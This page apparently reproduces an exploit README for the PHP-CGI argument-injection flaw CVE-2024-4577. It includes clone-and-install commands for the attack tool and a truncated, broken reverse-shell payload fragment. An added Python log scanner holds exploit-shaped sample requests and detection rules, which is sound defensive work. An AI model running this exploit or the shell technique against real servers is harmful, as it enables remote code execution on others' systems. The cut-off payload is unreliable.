API Security Blog

Exploit for OS Command Injection in PHP

# PHP CGI Argument Injection (CVE-2024-4577) RCE

## Description

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in the command line given to Win32 API functions. The PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to the PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.

"XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode."

## Table of Contents

- [Description](#description)
- [Installation](#installation)
- [Usage](#usage)
- [References](#references)

## Installation

```bash
$ git clone https://github.com/l0n3m4n/CVE-2024-4577-RCE.git
$ cd CVE-2024-4577-RCE && pip install -r requirements.txt
```

## Usage

![php-cgi](/php-cgi.png)

## Establishing reverse shell

### PHP Payload

> [!NOTE]
> This tool demonstrates realistic attack techniques (TTPs). However, this specific payload sample does not function in this scenario.

```php
# rev_shell.php &1 | Out-String );$sendback2 =…
```
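As an added defensive example (not part of the original README or the linked tool), the following Python scans constructed Apache access-log lines for the two request shapes the description above implies: direct hits on the exposed php-cgi.exe binary, and queries to PHP scripts carrying lone high bytes that are not valid UTF-8, since such bytes are what Windows Best-Fit mapping can rewrite before php-cgi parses its argument list. The log lines, paths and the "invalid UTF-8 in the query" heuristic are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed sample access-log lines (combined-log style); not from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2024:12:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.7 - - [10/Jun/2024:12:00:02 +0000] "POST /php-cgi/php-cgi.exe?%9Fd+x%3Dy HTTP/1.1" 200 88
10.0.0.9 - - [10/Jun/2024:12:00:03 +0000] "GET /search.php?q=caf%C3%A9 HTTP/1.1" 200 300
10.0.0.9 - - [10/Jun/2024:12:00:04 +0000] "GET /info.php?%A4s+foo HTTP/1.1" 200 300
10.0.0.3 - - [10/Jun/2024:12:00:05 +0000] "GET /img/logo.png?v=%E2%9C%93 HTTP/1.1" 200 300
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_query(query):
    """True when the percent-decoded query holds high bytes that are not valid UTF-8.
    Normal form data (UTF-8 text) decodes cleanly; a lone high byte is the kind of
    character Windows Best-Fit mapping may rewrite into ASCII before php-cgi parses
    its argument list. This heuristic is assumed by the example, not by the page."""
    raw = unquote_to_bytes(query)
    if all(b < 0x80 for b in raw):
        return False
    try:
        raw.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return False

def classify_request(target):
    """Return a reason string for a request worth an analyst's attention, else None."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if path.endswith("php-cgi.exe"):
        return "direct php-cgi.exe access"  # the binary should not be reachable over HTTP
    if path.endswith(".php") and suspicious_query(parts.query):
        return "non-UTF-8 high byte in query to PHP script"
    return None

def scan_log(text):
    """Return (request-target, reason) pairs for every flagged line of an access log."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if m:
            reason = classify_request(m.group("target"))
            if reason:
                hits.append((m.group("target"), reason))
    return hits
```

Ordinary UTF-8 form data such as `caf%C3%A9` is not flagged, so the rule stays quiet on legitimate international input while still catching lone high bytes.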
